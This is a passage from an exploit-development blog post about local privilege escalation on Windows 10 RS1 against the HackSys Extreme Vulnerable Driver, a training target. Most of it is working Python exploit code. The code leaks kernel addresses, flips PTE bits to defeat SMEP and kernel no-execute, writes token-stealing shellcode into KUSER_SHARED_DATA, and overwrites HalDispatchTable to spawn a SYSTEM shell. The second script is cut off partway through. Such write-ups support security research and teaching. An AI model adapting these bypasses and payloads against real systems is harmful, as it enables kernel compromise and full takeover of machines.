Notice the where is the address of the pointer addressof(base_of_ptes_pointer). This is because we don’t want to overwrite the c_void_p’s address with anything - we want to store the value inside of the pointer.

This will store the value inside of the pointer because our write-what-where primitive writes a “what” value to a pointer.

Next, we make an IOCTL call to the routine that jumps to the arbitrary write in the driver.

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pte_pointer,                    # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped

A little Python ctypes magic here on dereferencing pointers.

# CTypes way of dereferencing a C void pointer
base_of_ptes = struct.unpack('<Q', base_of_ptes_pointer)[0]

The above snippet of code will read in the c_void_p() (which contains the base of the PTEs) and store it in the variable base_of_ptes.

Utilizing the base of the PTEs, we can now dynamically retrieve the location of our shellcode’s PTE by putting all of the code together!

We have successfully defeated page table randomization!

Read, Read, Read… Again!

Now that we have dynamically resolved the PTE address for our shellcode, we need to use our arbitrary read again to dereference the shellcode’s PTE and extract the PTE control bits so we can modify the page table entry to be kernel mode.

Using the same primitive as above, we can use Python again to dynamically retrieve all of this!

Firstly, we need to create another structure (again, one member for “what” and one member for “where”).

# Second structure, for obtaining the control bits for the PTE
class WriteWhatWhere_PTE_Control_Bits(Structure):
    _fields_ = [
        ("What_PTE_Control_Bits", c_void_p),
        ("Where_PTE_Control_Bits", c_void_p)

Secondly, we declare another c_void_p.

shellcode_pte_bits_pointer = c_void_p()

Thirdly, we initialize our structure with the appropriate variables

# Write-what-where structure #2
www_pte_bits = WriteWhatWhere_PTE_Control_Bits()
www_pte_bits.What_PTE_Control_Bits = shellcode_pte
www_pte_bits.Where_PTE_Control_Bits = addressof(shellcode_pte_bits_pointer)
www_pte_bits_pointer = pointer(www_pte_bits)

We then make another call to the IOCTL responsible for the vulnerability.

Before executing our updated exploit, let’s restart the computer to prove everything is working dynamically.

Our combined code executes - resulting in the extraction of the PTE control bits!

Awesome! All that is left now that is to modify the U/S bit of the PTE control bits and then execute our shellcode!

Write, Write, Write!

Now that we have read in all of the information we need, it is time to modify the PTE of the shellcode memory page. To do this, all we need to do is subtract the extracted PTE control bits by 4.

# Currently, the PTE control bit for U/S of the shellcode is that of a user mode memory page
# Flipping the U (user) bit to an S (supervisor/kernel) bit
shellcode_pte_control_bits_kernelmode = shellcode_pte_control_bits_usermode - 4

Now we have successfully gotten the value we would like to write over our current PTE, it is time to actually make the write.

To do this, we first setup a structure, just like the read primitive.

# Third structure, to overwrite the U (user) PTE control bit to an S (supervisor/kernel) bit
class WriteWhatWhere_PTE_Overwrite(Structure):
    _fields_ = [
        ("What_PTE_Overwrite", c_void_p),
        ("Where_PTE_Overwrite", c_void_p)

This time, however, we store the PTE bits in a pointer so when the write occurs, it writes the bits instead of trying to extract the memory address of 2000000046b0f867 - which is not a valid address.

# Need to store the PTE control bits as a pointer
# Using addressof(pte_overwrite_pointer) in Write-what-where structure #4 since a pointer to the PTE control bits are needed
pte_overwrite_pointer = c_void_p(shellcode_pte_control_bits_kernelmode)

Then, we initialize the structure again.

# Write-what-where structure #4
www_pte_overwrite = WriteWhatWhere_PTE_Overwrite()
www_pte_overwrite.What_PTE_Overwrite = addressof(pte_overwrite_pointer)
www_pte_overwrite.Where_PTE_Overwrite = shellcode_pte
www_pte_overwrite_pointer = pointer(www_pte_overwrite)

After everything is good to go, we make another IOCTL call to trigger the vulnerability, and we successfully turn our user mode page into a kernel mode page dynamically!

Goodbye, SMEP (v2 ft. PTE Overwrite)!

All that is left to do now is execute our shellcode via nt!HalDispatchTable+0x8 and nt!KeQueryIntervalProfile(). Since I have already done a post outlining how this works, I will link you to it so you can see how this actually executes our shellcode. This blog post assumes the reader has minimal knowledge of arbitrary memory overwrites to begin with.

Here is the final exploit, which can also be found on my GitHub.

# HackSysExtreme Vulnerable Driver Kernel Exploit (x64 Arbitrary Overwrite/SMEP Enabled)
# Windows 10 RS1 - SMEP Bypass via PTE Overwrite
# Author: Connor McGarr

import struct
import sys
import os
from ctypes import *

kernel32 = windll.kernel32
ntdll = windll.ntdll
psapi = windll.Psapi

# Fist structure, for obtaining nt!MiGetPteAddress+0x13 value
class WriteWhatWhere_PTE_Base(Structure):
    _fields_ = [
        ("What_PTE_Base", c_void_p),
        ("Where_PTE_Base", c_void_p)

# Second structure, for obtaining the control bits for the PTE
class WriteWhatWhere_PTE_Control_Bits(Structure):
    _fields_ = [
        ("What_PTE_Control_Bits", c_void_p),
        ("Where_PTE_Control_Bits", c_void_p)

# Third structure, to overwrite the U (user) PTE control bit to an S (supervisor/kernel) bit
class WriteWhatWhere_PTE_Overwrite(Structure):
    _fields_ = [
        ("What_PTE_Overwrite", c_void_p),
        ("Where_PTE_Overwrite", c_void_p)

# Fourth structure, to overwrite HalDispatchTable + 0x8 with kernel mode shellcode page
class WriteWhatWhere(Structure):
    _fields_ = [
        ("What", c_void_p),
        ("Where", c_void_p)

# Token stealing payload
payload = bytearray(
    "\x65\x48\x8B\x04\x25\x88\x01\x00\x00"              # mov rax,[gs:0x188]  ; Current thread (KTHREAD)
    "\x48\x8B\x80\xB8\x00\x00\x00"                      # mov rax,[rax+0xb8]  ; Current process (EPROCESS)
    "\x48\x89\xC3"                                      # mov rbx,rax         ; Copy current process to rbx
    "\x48\x8B\x9B\xF0\x02\x00\x00"                      # mov rbx,[rbx+0x2f0] ; ActiveProcessLinks
    "\x48\x81\xEB\xF0\x02\x00\x00"                      # sub rbx,0x2f0       ; Go back to current process
    "\x48\x8B\x8B\xE8\x02\x00\x00"                      # mov rcx,[rbx+0x2e8] ; UniqueProcessId (PID)
    "\x48\x83\xF9\x04"                                  # cmp rcx,byte +0x4   ; Compare PID to SYSTEM PID
    "\x75\xE5"                                          # jnz 0x13            ; Loop until SYSTEM PID is found
    "\x48\x8B\x8B\x58\x03\x00\x00"                      # mov rcx,[rbx+0x358] ; SYSTEM token is @ offset _EPROCESS + 0x358
    "\x80\xE1\xF0"                                      # and cl, 0xf0        ; Clear out _EX_FAST_REF RefCnt
    "\x48\x89\x88\x58\x03\x00\x00"                      # mov [rax+0x358],rcx ; Copy SYSTEM token to current process
    "\x48\x31\xC0"                                      # xor rax,rax         ; set NTSTATUS SUCCESS
    "\xC3"                                              # ret                 ; Done!

# Defeating DEP with VirtualAlloc. Creating RWX memory, and copying the shellcode in that region.
print "[+] Allocating RWX region for shellcode"
ptr = kernel32.VirtualAlloc(
    c_int(0),                         # lpAddress
    c_int(len(payload)),              # dwSize
    c_int(0x3000),                    # flAllocationType
    c_int(0x40)                       # flProtect

# Creates a ctype variant of the payload (from_buffer)
c_type_buffer = (c_char * len(payload)).from_buffer(payload)

print "[+] Copying shellcode to newly allocated RWX region"
    c_int(ptr),                       # Destination (pointer)
    c_type_buffer,                    # Source (pointer)
    c_int(len(payload))               # Length

# Print update statement for shellcode location
print "[+] Shellcode is located at {0}".format(hex(ptr))

# Creating a pointer for the shellcode (write-what-where writes a pointer to a pointer)
# Using addressof(shellcode_pointer) in Write-what-where structure #5
shellcode_pointer = c_void_p(ptr)

# c_ulonglong because of x64 size (unsigned __int64)
base = (c_ulonglong * 1024)()

print "[+] Calling EnumDeviceDrivers()..."
get_drivers = psapi.EnumDeviceDrivers(
    byref(base),                      # lpImageBase (array that receives list of addresses)
    sizeof(base),                     # cb (size of lpImageBase array, in bytes)
    byref(c_long())                   # lpcbNeeded (bytes returned in the array)

# Error handling if function fails
if not base:
    print "[+] EnumDeviceDrivers() function call failed!"

# The first entry in the array with device drivers is ntoskrnl base address
kernel_address = base[0]

# Print update for ntoskrnl.exe base address
print "[+] Found kernel leak!"
print "[+] ntoskrnl.exe base address: {0}".format(hex(kernel_address))

# Phase 1: Grab the base of the PTEs via nt!MiGetPteAddress

# Retrieving nt!MiGetPteAddress (Windows 10 RS1 offset)
nt_mi_get_pte_address = kernel_address + 0x51214

# Print update for nt!MiGetPteAddress address 
print "[+] nt!MiGetPteAddress is located at: {0}".format(hex(nt_mi_get_pte_address))

# Base of PTEs is located at nt!MiGetPteAddress + 0x13
pte_base = nt_mi_get_pte_address + 0x13

# Print update for nt!MiGetPteAddress+0x13 address
print "[+] nt!MiGetPteAddress+0x13 is located at: {0}".format(hex(pte_base))

# Creating a pointer in which the contents of nt!MiGetPteAddress+0x13 will be stored in to
# Base of the PTEs are stored here
base_of_ptes_pointer = c_void_p()

# Write-what-where structure #1
www_pte_base = WriteWhatWhere_PTE_Base()
www_pte_base.What_PTE_Base = pte_base
www_pte_base.Where_PTE_Base = addressof(base_of_ptes_pointer)
www_pte_pointer = pointer(www_pte_base)

# Getting handle to driver to return to DeviceIoControl() function
handle = kernel32.CreateFileA(
    "\\\\.\\HackSysExtremeVulnerableDriver", # lpFileName
    0xC0000000,                         # dwDesiredAccess
    0,                                  # dwShareMode
    None,                               # lpSecurityAttributes
    0x3,                                # dwCreationDisposition
    0,                                  # dwFlagsAndAttributes
    None                                # hTemplateFile

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pte_pointer,                    # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped

# CTypes way of dereferencing a C void pointer
base_of_ptes = struct.unpack('<Q', base_of_ptes_pointer)[0]

# Print update for PTE base
print "[+] Leaked base of PTEs!"
print "[+] Base of PTEs are located at: {0}".format(hex(base_of_ptes))

# Phase 2: Calculate the shellcode's PTE address

# Calculating the PTE for shellcode memory page
shellcode_pte = ptr >> 9
shellcode_pte &= 0x7ffffffff8
shellcode_pte += base_of_ptes

# Print update for Shellcode PTE
print "[+] PTE for the shellcode memory page is located at {0}".format(hex(shellcode_pte))

# Phase 3: Extract shellcode's PTE control bits

# Declaring C void pointer to store shellcode PTE control bits
shellcode_pte_bits_pointer = c_void_p()

# Write-what-where structure #2
www_pte_bits = WriteWhatWhere_PTE_Control_Bits()
www_pte_bits.What_PTE_Control_Bits = shellcode_pte
www_pte_bits.Where_PTE_Control_Bits = addressof(shellcode_pte_bits_pointer)
www_pte_bits_pointer = pointer(www_pte_bits)

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pte_bits_pointer,               # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped

# CTypes way of dereferencing a C void pointer
shellcode_pte_control_bits_usermode = struct.unpack('<Q', shellcode_pte_bits_pointer)[0]

# Print update for PTE control bits
print "[+] PTE control bits for shellcode memory page: {:016x}".format(shellcode_pte_control_bits_usermode)

# Phase 4: Overwrite current PTE U/S bit for shellcode page with an S (supervisor/kernel)

# Currently, the PTE control bit for U/S of the shellcode is that of a user mode memory page
# Flipping the U (user) bit to an S (supervisor/kernel) bit
shellcode_pte_control_bits_kernelmode = shellcode_pte_control_bits_usermode - 4

# Need to store the PTE control bits as a pointer
# Using addressof(pte_overwrite_pointer) in Write-what-where structure #4 since a pointer to the PTE control bits are needed
pte_overwrite_pointer = c_void_p(shellcode_pte_control_bits_kernelmode)

# Write-what-where structure #4
www_pte_overwrite = WriteWhatWhere_PTE_Overwrite()
www_pte_overwrite.What_PTE_Overwrite = addressof(pte_overwrite_pointer)
www_pte_overwrite.Where_PTE_Overwrite = shellcode_pte
www_pte_overwrite_pointer = pointer(www_pte_overwrite)

# Print update for PTE overwrite
print "[+] Goodbye SMEP..."
print "[+] Overwriting shellcodes PTE user control bit with a supervisor control bit..."

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pte_overwrite_pointer,          # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped

# Print update for PTE overwrite round 2
print "[+] User mode shellcode page is now a kernel mode page!"

# Phase 5: Shellcode

# nt!HalDispatchTable address (Windows 10 RS1 offset)
haldispatchtable_base_address = kernel_address + 0x2f1330

# nt!HalDispatchTable + 0x8 address
haldispatchtable = haldispatchtable_base_address + 0x8

# Print update for nt!HalDispatchTable + 0x8
print "[+] nt!HalDispatchTable + 0x8 is located at: {0}".format(hex(haldispatchtable))

# Write-what-where structure #5
www = WriteWhatWhere()
www.What = addressof(shellcode_pointer)
www.Where = haldispatchtable
www_pointer = pointer(www)

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
print "[+] Interacting with the driver..."
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pointer,                        # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped

# Actually calling NtQueryIntervalProfile function, which will call HalDispatchTable + 0x8, where the shellcode will be waiting.

# Print update for shell
print "[+] Enjoy the NT AUTHORITY\SYSTEM shell!"
os.system("cmd.exe /K cd C:\\")


Rinse and Repeat

Did you think I forgot about you, kernel no-execute (NX)?

Let’s say that for some reason, you are against the method of allocating user mode code. There are many reasons for that, one of them being EDR hooking of crucial functions like VirtualAlloc().

Let’s say you want to take advantage of various defensive tools and their lack of visibility into kernel mode. How can we leverage already existing kernel mode memory in the same manner?

Okay, This Time We Are Going To The Mountain! KUSER_SHARED_DATA Time!

Morten in his research suggests that another suitable method may be to utilize the KUSER_SHARED_DATA structure in the kernel directly, similarly to how ROP works in user mode.

The concept of ROP in user mode is the idea that we have the ability to write shellcode to the stack, we just don’t have the ability to execute it. Using ROP, we can change the permissions of the stack to that of executable, and execute our shellcode from there.

The concept here is no different. We can write our shellcode to KUSER_SHARED_DATA+0x800, because it is a kernel mode page with writeable permissions.

Using our write and read primtives, we can then flip the NX bit (similar to ROP in user mode) and make the kernel mode memory executable!

The questions still remains, why KUSER_SHARED_DATA?

Static Electricity

Windows has slowly but surely dried up all of the static addresses used by exploit developers over the years. One of the last structures that many people used for kASLR bypasses, was the lack of randomization of the HAL heap. The HAL heap used to contain a pointer to the kernel AND be static, but no longer is static.

Although everything is dynamically based, there is still a structure that remains which is static, KUSER_SHARED_DATA.

This structure, according to Geoff Chappell, is used to define the layout of data that the kernel shares with user mode.

The issue is, this structure is static at the address 0xFFFFF78000000000!

What is even more interesting, is that KUSER_SHARED_DATA+0x800 seems to just be a code cave of non-executable kernel mode memory which is writeable!

How Do We Leverage This?

Our arbitrary write primitive only allows us to write one QWORD of data at a time (8 bytes). My thought process here is to:

  1. Break up the 67 byte shellcode into 8 byte pieces and compensate any odd numbering with NULL bytes.
  2. Write each line of shellcode to KUSER_SHARED_DATA+0x800, KUSER_SHARED_DATA+0x808,KUSER_SHARED_DATA+0x810, etc.
  3. Use the same read primitive to bypass page table randomization and obtain PTE control bits of KUSER_SHARED_DATA+0x800.
  4. Make KUSER_SHARED_DATA+0x800 executable by overwriting the PTE.

Before we begin, the steps about obtaining the contents of nt!MiGetPteAddress+0x13 and extracting the PTE control bits will be left out in this portion of the blog, as they have already been explained in the beginning of this post!

Moving on, let’s start with each line of shellcode.

For each line written the data type chosen was that of a c_ulonglong() - as it was easy to store into a c_void_p.

The first line of shellcode had an associated structure as shown below.

class WriteWhatWhere_Shellcode_1(Structure):
    _fields_ = [
        ("What_Shellcode_1", c_void_p),
        ("Where_Shellcode_1", c_void_p)

Shellcode is declared as a c_ulonglong().

# Using just long long integer, because only writing opcodes.
first_shellcode = c_ulonglong(0x00018825048B4865)

The shellcode is then written to KUSER_SHARED_DATA+0x800 through the previously created structure.

www_shellcode_one = WriteWhatWhere_Shellcode_1()
www_shellcode_one.What_Shellcode_1 = addressof(first_shellcode)
www_shellcode_one.Where_Shellcode_1 = KUSER_SHARED_DATA + 0x800
www_shellcode_one_pointer = pointer(www_shellcode_one)

This same process was repeated 9 times, until all of the shellcode was written.

As you can see in the image below, the shellcode was successfully written to KUSER_SHARED_DATA+0x800 due to the writeable PTE control bit of this structure.

Executable, Please!

Using the same arbitrary read primitives as earlier, we can extract the PTE control bits of KUSER_SHARED_DATA+0x800’s memory page. This time, however, instead of subtracting 4 - we are going to use bitwise AND per Morten’s research.

# Setting KUSER_SHARED_DATA + 0x800 to executable
pte_control_bits_execute= pte_control_bits_no_execute & 0x0FFFFFFFFFFFFFFF

We can see that dynamically, we can set KUSER_SHARED_DATA+0x800 to executable memory, giving us a nice big executable kernel memory region!

All that is left to do now, is overwrite the nt!HalDispatchTable+0x8 with the address of KUSER_SHARED_DATA+0x800 and nt!KeQueryIntervalProfile() will take care of the rest!

This exploit can also be found on my GitHub, but here it is if you do not feel like heading over there:

# HackSysExtreme Vulnerable Driver Kernel Exploit (x64 Arbitrary Overwrite/SMEP Enabled)
# KUSER_SHARED_DATA + 0x800 overwrite
# Windows 10 RS1
# Author: Connor McGarr

import struct
import sys
import os
from ctypes import *

kernel32 = windll.kernel32
ntdll = windll.ntdll
psapi = windll.Psapi


# First structure, for obtaining nt!MiGetPteAddress+0x13 value
class WriteWhatWhere_PTE_Base(Structure):
    _fields_ = [
        ("What_PTE_Base", c_void_p),
        ("Where_PTE_Base", c_void_p)

# Second structure, first 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_1(Structure):
    _fields_ = [
        ("What_Shellcode_1", c_void_p),
        ("Where_Shellcode_1", c_void_p)

# Third structure, next 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_2(Structure):
    _fields_ = [
        ("What_Shellcode_2", c_void_p),
        ("Where_Shellcode_2", c_void_p)

# Fourth structure, next 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_3(Structure):
    _fields_ = [
        ("What_Shellcode_3", c_void_p),
        ("Where_Shellcode_3", c_void_p)

# Fifth structure, next 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_4(Structure):
    _fields_ = [
        ("What_Shellcode_4", c_void_p),
        ("Where_Shellcode_4", c_void_p)

# Sixth structure, next 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_5(Structure):
    _fields_ = [
        ("What_Shellcode_5", c_void_p),
        ("Where_Shellcode_5", c_void_p)

# Seventh structure, next 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_6(Structure):
    _fields_ = [
        ("What_Shellcode_6", c_void_p),
        ("Where_Shellcode_6", c_void_p)

# Eighth structure, next 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_7(Structure):
    _fields_ = [
        ("What_Shellcode_7", c_void_p),
        ("Where_Shellcode_7", c_void_p)

# Ninth structure, next 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_8(Structure):
    _fields_ = [
        ("What_Shellcode_8", c_void_p),
        ("Where_Shellcode_8", c_void_p)

# Tenth structure, last 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_9(Structure):
    _fields_ = [
        ("What_Shellcode_9", c_void_p),
        ("Where_Shellcode_9", c_void_p)

# Eleventh structure, for obtaining the control bits for the PTE
class WriteWhatWhere_PTE_Control_Bits(Structure):
    _fields_ = [
        ("What_PTE_Control_Bits", c_void_p),
        ("Where_PTE_Control_Bits", c_void_p)

# Twelfth structure, to overwrite executable bit of KUSER_SHARED_DATA+0x800's PTE
class WriteWhatWhere_PTE_Overwrite(Structure):
    _fields_ = [
        ("What_PTE_Overwrite", c_void_p),
        ("Where_PTE_Overwrite", c_void_p)

# Thirteenth structure, to overwrite HalDispatchTable + 0x8 with KUSER_SHARED_DATA + 0x800
class WriteWhatWhere(Structure):
    _fields_ = [
        ("What", c_void_p),
        ("Where", c_void_p)

Token stealing payload

\x65\x48\x8B\x04\x25\x88\x01\x00\x00              # mov rax,[gs:0x188]  ; Current thread (KTHREAD)
\x48\x8B\x80\xB8\x00\x00\x00                      # mov rax,[rax+0xb8]  ; Current process (EPROCESS)
\x48\x89\xC3                                      # mov rbx,rax         ; Copy current process to rbx
\x48\x8B\x9B\xF0\x02\x00\x00                      # mov rbx,[rbx+0x2f0] ; ActiveProcessLinks
\x48\x81\xEB\xF0\x02\x00\x00                      # sub rbx,0x2f0       ; Go back to current process
\x48\x8B\x8B\xE8\x02\x00\x00                      # mov rcx,[rbx+0x2e8] ; UniqueProcessId (PID)
\x48\x83\xF9\x04                                  # cmp rcx,byte +0x4   ; Compare PID to SYSTEM PID
\x75\xE5                                          # jnz 0x13            ; Loop until SYSTEM PID is found
\x48\x8B\x8B\x58\x03\x00\x00                      # mov rcx,[rbx+0x358] ; SYSTEM token is @ offset _EPROCESS + 0x358
\x80\xE1\xF0                                      # and cl, 0xf0        ; Clear out _EX_FAST_REF RefCnt
\x48\x89\x88\x58\x03\x00\x00                      # mov [rax+0x358],rcx ; Copy SYSTEM token to current process
\x48\x31\xC0                                      # xor rax,rax         ; set NTSTATUS SUCCESS
\xC3                                              # ret                 ; Done!

# c_ulonglong because of x64 size (unsigned __int64)
base = (c_ulonglong * 1024)()

print "[+] Calling EnumDeviceDrivers()..."
get_drivers = psapi.EnumDeviceDrivers(
    byref(base),                      # lpImageBase (array that receives list of addresses)
    sizeof(base),                     # cb (size of lpImageBase array, in bytes)
    byref(c_long())                   # lpcbNeeded (bytes returned in the array)

# Error handling if function fails
if not base:
    print "[+] EnumDeviceDrivers() function call failed!"

# The first entry in the array with device drivers is ntoskrnl base address
kernel_address = base[0]

# Print update for ntoskrnl.exe base address
print "[+] Found kernel leak!"
print "[+] ntoskrnl.exe base address: {0}".format(hex(kernel_address))

# Phase 1: Grab the base of the PTEs via nt!MiGetPteAddress

# Retrieving nt!MiGetPteAddress (Windows 10 RS1 offset)
nt_mi_get_pte_address = kernel_address + 0x1b5f4

# Print update for nt!MiGetPteAddress address 
print "[+] nt!MiGetPteAddress is located at: {0}".format(hex(nt_mi_get_pte_address))

# Base of PTEs is located at nt!MiGetPteAddress + 0x13
pte_base = nt_mi_get_pte_address + 0x13

# Print update for nt!MiGetPteAddress+0x13 address
print "[+] nt!MiGetPteAddress+0x13 is located at: {0}".format(hex(pte_base))

# Creating a pointer in which the contents of nt!MiGetPteAddress+0x13 will be stored in to
# Base of the PTEs are stored here
base_of_ptes_pointer = c_void_p()

# Write-what-where structure #1
www_pte_base = WriteWhatWhere_PTE_Base()
www_pte_base.What_PTE_Base = pte_base
www_pte_base.Where_PTE_Base = addressof(base_of_ptes_pointer)
www_pte_pointer = pointer(www_pte_base)

# Getting handle to driver to return to DeviceIoControl() function
handle = kernel32.CreateFileA(
    "\\\\.\\HackSysExtremeVulnerableDriver", # lpFileName
    0xC0000000,                         # dwDesiredAccess
    0,                                  # dwShareMode
    None,                               # lpSecurityAttributes
    0x3,                                # dwCreationDisposition
    0,                                  # dwFlagsAndAttributes
    None                                # hTemplateFile

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pte_pointer,                       # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped

# CTypes way of extracting value from a C void pointer
base_of_ptes = struct.unpack('<Q', base_of_ptes_pointer)[0]

# Print update for PTE base
print "[+] Leaked base of PTEs!"
print "[+] Base of PTEs are located at: {0}".format(hex(base_of_ptes))

# Phase 2: Calculate KUSER_SHARED_DATA's PTE address

# Calculating the PTE for KUSER_SHARED_DATA + 0x800
kuser_shared_data_800_pte_address = KUSER_SHARED_DATA + 0x800 >> 9
kuser_shared_data_800_pte_address &= 0x7ffffffff8
kuser_shared_data_800_pte_address += base_of_ptes

# Print update for KUSER_SHARED_DATA + 0x800 PTE
print "[+] PTE for KUSER_SHARED_DATA + 0x800 is located at {0}".format(hex(kuser_shared_data_800_pte_address))

# Phase 3: Write shellcode to KUSER_SHARED_DATA + 0x800

# First 8 bytes

# Using just long long integer, because only writing opcodes.
first_shellcode = c_ulonglong(0x00018825048B4865)

# Write-what-where structure #2
www_shellcode_one = WriteWhatWhere_Shellcode_1()
www_shellcode_one.What_Shellcode_1 = addressof(first_shellcode)
www_shellcode_one.Where_Shellcode_1 = KUSER_SHARED_DATA + 0x800
www_shellcode_one_pointer = pointer(www_shellcode_one)

# Print update for shellcode
print "[+] Writing first 8 bytes of shellcode to KUSER_SHARED_DATA + 0x800..."

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_one_pointer,          # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped

# Next 8 bytes
second_shellcode = c_ulonglong(0x000000B8808B4800)

# Write-what-where structure #3
www_shellcode_two = WriteWhatWhere_Shellcode_2()
www_shellcode_two.What_Shellcode_2 = addressof(second_shellcode)
www_shellcode_two.Where_Shellcode_2 = KUSER_SHARED_DATA + 0x808
www_shellcode_two_pointer = pointer(www_shellcode_two)

# Print update for shellcode
print "[+] Writing next 8 bytes of shellcode to KUSER_SHARED_DATA + 0x808..."

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_two_pointer,          # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped

# Next 8 bytes
third_shellcode = c_ulonglong(0x02F09B8B48C38948)

# Write-what-where structure #4
www_shellcode_three = WriteWhatWhere_Shellcode_3()
www_shellcode_three.What_Shellcode_3 = addressof(third_shellcode)
www_shellcode_three.Where_Shellcode_3 = KUSER_SHARED_DATA + 0x810
www_shellcode_three_pointer = pointer(www_shellcode_three)

# Print update for shellcode
print "[+] Writing next 8 bytes of shellcode to KUSER_SHARED_DATA + 0x810..."

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_three_pointer,        # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped

# Next 8 bytes
fourth_shellcode = c_ulonglong(0x0002F0EB81480000)

# Write-what-where structure #5
www_shellcode_four = WriteWhatWhere_Shellcode_4()
www_shellcode_four.What_Shellcode_4 = addressof(fourth_shellcode)
www_shellcode_four.Where_Shellcode_4 = KUSER_SHARED_DATA + 0x818
www_shellcode_four_pointer = pointer(www_shellcode_four)

# Print update for shellcode
print "[+] Writing next 8 bytes of shellcode to KUSER_SHARED_DATA + 0x818..."

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_four_pointer,         # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped

# Next 8 bytes
fifth_shellcode = c_ulonglong(0x000002E88B8B4800)

# Write-what-where structure #6
www_shellcode_five = WriteWhatWhere_Shellcode_5()
www_shellcode_five.What_Shellcode_5 = addressof(fifth_shellcode)
www_shellcode_five.Where_Shellcode_5 = KUSER_SHARED_DATA + 0x820
www_shellcode_five_pointer = pointer(www_shellcode_five)

# Print update for shellcode
print "[+] Writing next 8 bytes of shellcode to KUSER_SHARED_DATA + 0x820..."

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_five_pointer,         # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped

# Next 8 bytes
sixth_shellcode = c_ulonglong(0x8B48E57504F98348)

# Write-what-where structure #7
www_shellcode_six = WriteWhatWhere_Shellcode_6()
www_shellcode_six.What_Shellcode_6 = addressof(sixth_shellcode)
www_shellcode_six.Where_Shellcode_6 = KUSER_SHARED_DATA + 0x828
www_shellcode_six_pointer = pointer(www_shellcode_six)

# Print update for shellcode
print "[+] Writing next 8 bytes of shellcode to KUSER_SHARED_DATA + 0x828..."

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_six_pointer,          # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped

# Next 8 bytes
seventh_shellcode = c_ulonglong(0xF0E180000003588B)

# Write-what-where structure #8
www_shellcode_seven = WriteWhatWhere_Shellcode_7()
www_shellcode_seven.What_Shellcode_7 = addressof(seventh_shellcode)
www_shellcode_seven.Where_Shellcode_7 = KUSER_SHARED_DATA + 0x830
www_shellcode_seven_pointer = pointer(www_shellcode_seven)

# Print update for shellcode
